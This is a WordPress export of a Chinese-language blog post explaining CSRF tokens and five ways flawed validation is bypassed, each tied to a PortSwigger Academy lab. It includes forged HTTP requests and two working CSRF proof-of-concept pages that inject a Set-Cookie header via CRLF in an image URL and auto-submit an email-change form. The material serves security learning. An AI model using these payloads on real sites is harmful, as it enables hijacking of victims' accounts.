<\/p>\n\n\n\n
CSRF Token\u662f\u7531\u4f3a\u670d\u5668\u7aef\u61c9\u7528\u7a0b\u5f0f\u7522\u751f\u4e26\u8207\u5ba2\u6236\u7aef\u5171\u7528\u7684\u552f\u4e00\u3001\u79d8\u5bc6\u4e14\u4e0d\u53ef\u9810\u6e2c\u7684\u503c\u3002\u7576\u767c\u51fa\u57f7\u884c\u654f\u611f\u64cd\u4f5c\uff08\u4f8b\u5982\u63d0\u4ea4\u8868\u55ae\uff09\u7684\u8acb\u6c42\u6642\uff0c\u5ba2\u6236\u7aef\u5fc5\u9808\u5305\u542b\u6b63\u78ba\u7684 CSRF Token\u3002\u5426\u5247\uff0c\u4f3a\u670d\u5668\u5c07\u62d2\u7d55\u57f7\u884c\u8acb\u6c42\u7684\u64cd\u4f5c\u3002<\/p>\n\n\n\n
\u8207\u5ba2\u6236\u7aef\u5171\u7528 CSRF Token\u7684\u5e38\u898b\u65b9\u6cd5\u662f\u5c07\u5b83\u5011\u4f5c\u70ba\u96b1\u85cf\u53c3\u6578\u5305\u542b\u5728 HTML \u8868\u55ae\u4e2d\uff0c\u5982\u4e0b\uff1a<\/p>\n\n\n\n
<form name=\"change-email-form\" action=\"\/my-account\/change-email\" method=\"POST\">\r\n <label>Email<\/label>\r\n <input required type=\"email\" name=\"email\" value=\"example@normal-website.com\">\r\n <input required type=\"hidden\" name=\"csrf\" value=\"50FaWgdOhi9M9wyna8taR1k3ODOR8d6u<\/mark>\">\r\n <button class='button' type='submit'> Update email <\/button>\r\n<\/form><\/code><\/pre>\n\n\n\n\u63d0\u4ea4\u6b64\u8868\u55ae\u6703\u7522\u751f\u4ee5\u4e0b\u8acb\u6c42 <\/p>\n\n\n\n
POST \/my-account\/change-email HTTP\/1.1\r\nHost: normal-website.com\r\nContent-Length: 70\r\nContent-Type: application\/x-www-form-urlencoded\r\n\r\ncsrf=50FaWgdOhi9M9wyna8taR1k3ODOR8d6u<\/mark>&email=example@normal-website.com<\/code><\/pre>\n\n\n\n\u7531\u65bc\u653b\u64ca\u8005\u7121\u6cd5\u9810\u6e2c CSRF \u4ee4\u724c\u7684\u6b63\u78ba\u503c\uff0c\u56e0\u6b64\u4ed6\u5011\u7121\u6cd5\u5c07\u5176\u5305\u542b\u5728\u60e1\u610f\u8acb\u6c42\u4e2d\uff0c\u5f9e\u800c\u6709\u52a9\u65bc\u9632\u6b62 CSRF \u653b\u64ca\u3002\u4f46CSRF Token\u6a5f\u5236\u5728\u9a57\u8b49\u6642\u6c92\u8a2d\u8a08\u597d\u5bb9\u6613\u88ab\u9952\u904e\uff0c\u5e38\u898b\u7f3a\u9677\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528GET<\/h2>\n\n\n\n
\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u5728\u8acb\u6c42\u4f7f\u7528 POST \u65b9\u6cd5\u6642\u6b63\u78ba\u9a57\u8b49\u4ee4\u724c\uff0c\u4f46\u5728\u4f7f\u7528 GET \u65b9\u6cd5\u6642\u6703\u8df3\u904e\u9a57\u8b49<\/p>\n\n\n\n
\u5047\u5982\u6709\u4e00\u500b\u9700\u8981CSRFtoken\u7684POST\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n
POST \/email\/change-email HTTP\/1.1\r\n...omit...\r\nemail=test%40gmail.com&csrf=Odxoj2H1IQjRpXQS1Lr48QL60BmEfWIh<\/code><\/pre>\n\n\n\n\u4f46\u56e0\u70ba\u63db\u6210\u4ee5\u4e0bGET\u65b9\u6cd5\uff0c\u9001\u51fa\u8acb\u6c42\u53ef\u6210\u529f\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\n
GET \/email\/change-email?email=test%40gmail.com&csrf=abc HTTP\/1.1\n...omit...<\/code><\/pre>\n\n\n\nLab: CSRF where token validation depends on request method<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u7701\u7565\u53c3\u6578<\/h2>\n\n\n\n
\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u6703\u5728\u4ee4\u724c\u5b58\u5728\u6642\u6b63\u78ba\u9a57\u8b49\u4ee4\u724c\uff0c\u4f46\u5982\u679c\u4ee4\u724c\u88ab\u7701\u7565\uff0c\u5247\u6703\u8df3\u904e\u9a57\u8b49\u3002<\/p>\n\n\n\n
\u4f8b\u5982\u628a\u539f\u672c\u7684csrf\u53c3\u6578\u62ff\u6389\uff0c\u5982\u4e0b\uff0c\u9001\u51fa\u8acb\u6c42\u53ef\u6210\u529f\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\n
POST \/email\/change-email HTTP\/1.1\r\n...omit...\r\nemail=test%40gmail.com<\/code><\/pre>\n\n\n\nLab: CSRF where token validation depends on token being present<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528\u4efb\u4f55Token<\/h2>\n\n\n\n
\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u4e0d\u6703\u9a57\u8b49token\u662f\u5426\u8207\u767c\u51fa\u8acb\u6c42\u7684\u4f7f\u7528\u8005\u5c6c\u65bc\u540c\u4e00\u6703\u8a71\u3002\u6240\u4ee5\u653b\u64ca\u8005\u53ef\u4ee5\u4f7f\u7528\u81ea\u5df1\u7684\u5e33\u6236\u767b\u5165\u61c9\u7528\u7a0b\u5e8f\uff0c\u53d6\u5f97\u6709\u6548token\uff0c\u7136\u5f8c\u5728 CSRF \u653b\u64ca\u4e2d\u5c07\u8a72\u4ee4\u724c\u63d0\u4f9b\u7d66\u53d7\u5bb3\u8005\u4f7f\u7528\u8005\u3002<\/p>\n\n\n\n
\u5982\u4e0b\uff0c\u6b63\u5e38\u60c5\u6cc1\u4e0b\u9700\u8981\u4f7f\u7528\u7684token\u70baOdxoj2H1IQjRpXQS1Lr48QL60BmEfWIh\uff0c\u4f46\u56e0\u70ba\u7cfb\u7d71\u6709\u6f0f\u6d1e\uff0c\u6240\u4ee5\u6211\u7528\u5176\u4ed6\u5e33\u865f\u7522\u751f\u7684token\uff1aChMCfL6zII3jOfSWN3hPabevqBQbN7mX\u5982\u4e0b\uff0c\u7531\u65bc\u8a72token\u4e5f\u7684\u78ba\u662f\u670d\u52d9\u5668\u7522\u751f\u7684\uff0c\u56e0\u6b64\u9001\u51fa\u8acb\u6c42\u53ef\u6210\u529f\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\n
POST \/email\/change-email HTTP\/1.1\n...omit...\nemail=test%40gmail.com&csrf=ChMCfL6zII3jOfSWN3hPabevqBQbN7mX<\/code><\/pre>\n\n\n\nLab: CSRF where token is not tied to user session<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u8a2d\u5b9acookie\u6337\u5b9atoken<\/h2>\n\n\n\n
\u67d0\u4e9b\u61c9\u7528\u7a0b\u5f0f\u6703\u5c07token\u548ccsrfkey cookie<\/code>\u6337\u5b9a\u5728\u4e00\u8d77\uff0c\u4f7f\u7528\u5225\u4eba\u7684token\u5c31\u7121\u6cd5\u901a\u904e\u3002\u4f46\u5982\u679c\u7db2\u7ad9\u5b58\u5728\u8b93\u653b\u64ca\u8005\u5728\u53d7\u5bb3\u8005\u700f\u89bd\u5668\u4e2d\u8a2d\u5b9a cookie<\/code>\u7684\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u507d\u9020\u5225\u4eba\u7684csrfkey cookie<\/code>\u4e26\u642d\u914d\u5225\u4eba\u7684token\uff0c\u4e00\u6a23\u4e5f\u80fd\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\n<\/p>\n\n\n\n
\u5047\u8a2d\u67d0\u4e00\u7db2\u7ad9\u7684\u4fee\u6539email\u6d41\u7a0b\u5982\u4e0b\uff0c\u4e00\u958b\u59cb\u6703\u6709\u8868\u55ae\uff0c\u4e26\u7522\u751ftoken:VJfvEsG1frdEJeXIqRdNbccRjVSeX3UO<\/p>\n\n\n\n
########### request ############\r\nGET \/email HTTP\/1.1\r\nHost: ac6e1f601f0a2e9180d7373e00a40086.web-security-academy.net\r\n...omit...\r\nCookie: csrfKey=ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao; session=HVWbkOTIhdnWT8xT3RRgGz7o6Gbfg2iC\n\r\n########### response ########### \r\n...omit...\r\n<form class=\"login-form\" action=\"\/email\/change-email\" method=\"POST\">\r\n <label>Email<\/label>\r\n <input required type=\"email\" name=\"email\" value=\"\">\r\n <input required type=hidden name=csrf value=VJfvEsG1frdEJeXIqRdNbccRjVSeX3UO>\r\n <button class='button' type='submit'> Update email <\/button>\r\n <\/form>\r\n...omit...<\/code><\/pre>\n\n\n\n\u78ba\u8a8d\u8868\u55ae\u9001\u51fa\u8acb\u6c42\u5f8c\uff0c\u6703\u5e36\u4e0atoken\u53c3\u6578\uff0c\u9019\u5fc5\u9808\u8981\u548ccookie<\/code>\u4e2d\u7684csrfKey\u6337\u5b9a\uff0c\u53ea\u8981\u6709\u4e00\u65b9\u4e0d\u5c0d\u670d\u52d9\u5668\u5c31\u6703\u62d2\u7d55\u6b64\u8acb\u6c42<\/p>\n\n\n\nCookie<\/code>\u88e1csrfKey\u6703\u6337\u5b9atoken\u53c3\u6578\uff0c\u6bcf\u6b21\u767b\u5165csrfKey\u90fd\u4e0d\u8b8a\u3002\u4f46Cookie<\/code>\u88e1\u7684session<\/code>\u53c3\u6578\u662f\u7528\u65bc\u8eab\u4efd\u78ba\u8a8d\uff0c\u56e0\u6b64\u6bcf\u6b21\u767b\u5165\u90fd\u4e0d\u540c\uff0c\u5982\u4e0b\u3002<\/p>\n\n\n\n\rPOST \/email\/change-email HTTP\/1.1\r\nHost: ac6e1f601f0a2e9180d7373e00a40086.web-security-academy.net\r\n...omit...\r\nCookie: csrfKey=ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao<\/mark>; session=HVWbkOTIhdnWT8xT3RRgGz7o6Gbfg2iC\r\nemail=c%40gmail.com&csrf=VJfvEsG1frdEJeXIqRdNbccRjVSeX3UO\r<\/mark><\/code><\/pre>\n\n\n\n\u91cd\u65b0\u767b\u5165\u5f8csession<\/code>\u767c\u751f\u8b8a\u5316\uff0c\u4f46csrfKey\u4e0d\u8b8a\uff0c\u5982\u4e0b<\/p>\n\n\n\nGET \/?search=test HTTP\/1.1\r\nHost: ac6e1f601f0a2e9180d7373e00a40086.web-security-academy.net\r\n...omit...\r\nCookie: csrfKey=ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao; session=ePwzKMNVTh0uc7svlkGKdkOF7mqXbbf2\r<\/mark><\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5efa\u7acb\u4e00\u500b\u653b\u64ca\u9801\u9762\uff0ctoken\u53c3\u6578\u8a2d\u70baVJfvEsG1frdEJeXIqRdNbccRjVSeX3UO\uff0c\u4f46cookie<\/code>\u5167\u7684csrfkey\u53c3\u6578\u8981\u900f\u904e\u6f0f\u6d1e\u8a2d\u5b9a\u6210ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao\uff0c\u53ef\u5728\u8b80\u53d6\u5716\u7247\u7db2\u5740\u5f8c\u52a0\u4e0aSet-Cookie\u5230\u9054\u4fee\u6539cookie<\/code>\u7684\u6548\u679c\uff0c\u5982\u4e0b<\/p>\n\n\n\n<html>\r\n <!-- CSRF PoC - generated by Burp Suite Professional -->\r\n <body>\r\n <script>history.pushState('', '', '\/')<\/script>\r\n <form action=\"https:\/\/ac6e1f601f0a2e9180d7373e00a40086.web-security-academy.net\/email\/change-email\" method=\"POST\">\r\n <input type=\"hidden\" name=\"email\" value=\"c@gmail.com\" \/>\r\n <input type=\"hidden\" name=\"csrf\" value=\"VJfvEsG1frdEJeXIqRdNbccRjVSeX3UO<\/mark>\" \/>\r\n <\/form>\r\n<img src=\"https:\/\/ac6e1f601f0a2e9180d7373e00a40086.web-security-academy.net\/?search=test%0d%0aSet-Cookie:%20csrfKey=ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao<\/mark>\" onerror=\"document.forms[0].submit()\">\r\n <\/body>\r\n<\/html><\/code><\/pre>\n\n\n\n\u7576\u53d7\u5bb3\u8005\u958b\u555f\u653b\u64ca\u9801\u9762\u6642\uff0c\u5c31\u6703\u628a\u539f\u672c\u7684csrfkey\u6539\u6210ZogHxcJ1xdl3jjW0600H4VFmdb1qeGao\u4e26\u9001\u51fa\u8acb\u6c42\uff0c\u7b26\u5408csrfkey\u548ctoken\u6337\u5b9a\u7d50\u679c\uff0c\u56e0\u6b64\u53ef\u6210\u529f\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\n
Lab: CSRF where token is tied to non-session cookie<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
\u8a2d\u5b9acookie\u5275\u5efa\u6709\u6548token<\/h2>\n\n\n\n
\u6709\u4e9b\u61c9\u7528\u7684token\u662f\u76f4\u63a5\u8907\u5236cookie<\/code>\u4e2d\u7684\u53c3\u6578\uff0c\u7576\u9a57\u8b49\u5f8c\u7e8c\u8acb\u6c42\u6642\uff0c\u61c9\u7528\u7a0b\u5f0f\u53ea\u9700\u9a57\u8b49\u8acb\u6c42\u53c3\u6578\u4e2d\u63d0\u4ea4\u7684token\u662f\u5426\u8207 cookie <\/code>\u4e2d\u63d0\u4ea4\u7684\u503c\u76f8\u7b26\u3002\u4f46\u5982\u679c\u7db2\u7ad9\u5b58\u5728 cookie <\/code>\u8a2d\u5b9a\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u76f4\u63a5\u4fee\u6539cookie<\/code>\u7684\u503c\uff0c\u7b49\u540c\u53ef\u4ee5\u81ea\u5df1\u5275\u5efatoken\u503c\u3002<\/p>\n\n\n\n\u5047\u8a2d\u67d0\u4e00\u7db2\u7ad9\u7684\u4fee\u6539email\u6d41\u7a0b\u5982\u4e0b\uff0c\u4e00\u958b\u59cb\u6703\u6709\u8868\u55ae\uff0c\u4e26\u7522\u751ftoken:IwTpaentaermvyJZpnRszP2ByM4U1gdj\uff0c\u4f46\u9019\u548ccookie\u4e2d\u7684csrf\u503c\u662f\u4e00\u6a23\u7684<\/p>\n\n\n\n
########### request ############\nGET \/email HTTP\/1.1\r\nHost: acf61f1d1e08c0b280a313ed006600eb.web-security-academy.net\r\n...omit...\r\nCookie: LastSearchTerm=test; csrf=IwTpaentaermvyJZpnRszP2ByM4U1gdj<\/mark>; session=qCuAvd25MbYj2v76OPkS7UGE6ruTWoGU\r\n\n\r########### response############\n...omit...\r\n<form class=\"login-form\" action=\"\/email\/change-email\" method=\"POST\">\r\n <label>Email<\/label>\r\n <input required type=\"email\" name=\"email\" value=\"\">\r\n <input required type=\"hidden\" name=\"csrf\" value=\"IwTpaentaermvyJZpnRszP2ByM4U1gdj<\/mark>\">\r\n <button class='button' type='submit'> Update email <\/button>\r\n <\/form>\r\n...omit...<\/code><\/pre>\n\n\n\n\u78ba\u8a8d\u8868\u55ae\u9001\u51fa\u8acb\u6c42\u5f8c\uff0c\u6703\u5e36\u4e0atoken\u53c3\u6578\uff0c\u7531\u65bc\u548ccookie<\/code>\u4e2d\u7684csrf\u53c3\u6578\u76f8\u540c\uff0c\u56e0\u6b64\u670d\u52d9\u5668\u63a5\u53d7\u6b64\u8acb\u6c42<\/p>\n\n\n\nPOST \/email\/change-email HTTP\/1.1\r\nHost: acf61f1d1e08c0b280a313ed006600eb.web-security-academy.net\r\n...omit...\r\nCookie: LastSearchTerm=test; csrf=IwTpaentaermvyJZpnRszP2ByM4U1gdj<\/mark>; session=qCuAvd25MbYj2v76OPkS7UGE6ruTWoGU\r\nemail=test%40gmail.com&csrf=IwTpaentaermvyJZpnRszP2ByM4U1gdj<\/mark><\/code><\/pre>\n\n\n\n\u5efa\u7acb\u4e00\u500b\u653b\u64ca\u9801\u9762\uff0c\u8b93cookie<\/code>\u5167\u7684csrf\u53c3\u6578\u8a2d\u5b9a\u70bafake\uff0c\u53ef\u5728\u8b80\u53d6\u5716\u7247\u7db2\u5740\u5f8c\u52a0\u4e0aSet-Cookie\u5230\u9054\u4fee\u6539cookie<\/code>\u7684\u6548\u679c\u3002\u7136\u5f8ctoken\u4e5f\u8a2d\u5b9a\u70bafake\uff0c\u5982\u4e0b<\/p>\n\n\n\n<html>\r\n <!-- CSRF PoC - generated by Burp Suite Professional -->\r\n <body>\r\n <img src=\"https:\/\/acf61f1d1e08c0b280a313ed006600eb.web-security-academy.net\/?search=test%0d%0aSet-Cookie:%20csrf=fake<\/mark>\" onerror=\"document.forms[0].submit();\"\/>\r\n <form action=\"https:\/\/acf61f1d1e08c0b280a313ed006600eb.web-security-academy.net\/email\/change-email\" method=\"POST\">\r\n <input type=\"hidden\" name=\"email\" value=\"test@gmail.com\" \/>\r\n <input type=\"hidden\" name=\"csrf\" value=\"fake<\/mark>\" \/>\r\n <\/form>\r\n <\/body>\r\n<\/html><\/code><\/pre>\n\n\n\n\u7576\u53d7\u5bb3\u8005\u958b\u555f\u653b\u64ca\u9801\u9762\u6642\uff0c\u5c31\u6703\u628a\u539f\u672c\u7684cookie<\/code>\u5167\u7684csrf\u6539\u6210fake\uff0c\u5728\u9001\u51fa\u8acb\u6c42\u6642\u56e0\u70batoken\u4e5f\u662f\u8a2d\u5b9afake\uff0c\u6eff\u8db3\u670d\u52d9\u56682\u500b\u76f8\u7b26\u7684\u689d\u4ef6\uff0c\u56e0\u6b64\u53ef\u6210\u529f\u9952\u904etoken\u4fdd\u8b77<\/p>\n\n\n\nLab: CSRF where token is duplicated in cookie<\/p>\n","protected":false},"excerpt":{"rendered":"
CSRF Token\u662f\u7531\u4f3a\u670d\u5668\u7aef\u61c9\u7528\u7a0b\u5f0f\u7522\u751f\u4e26\u8207\u5ba2\u6236\u7aef\u5171\u7528\u7684 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[42],"class_list":["post-1295","post","type-post","status-publish","format-standard","hentry","category-clientside","tag-bypass"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1295"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1295\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}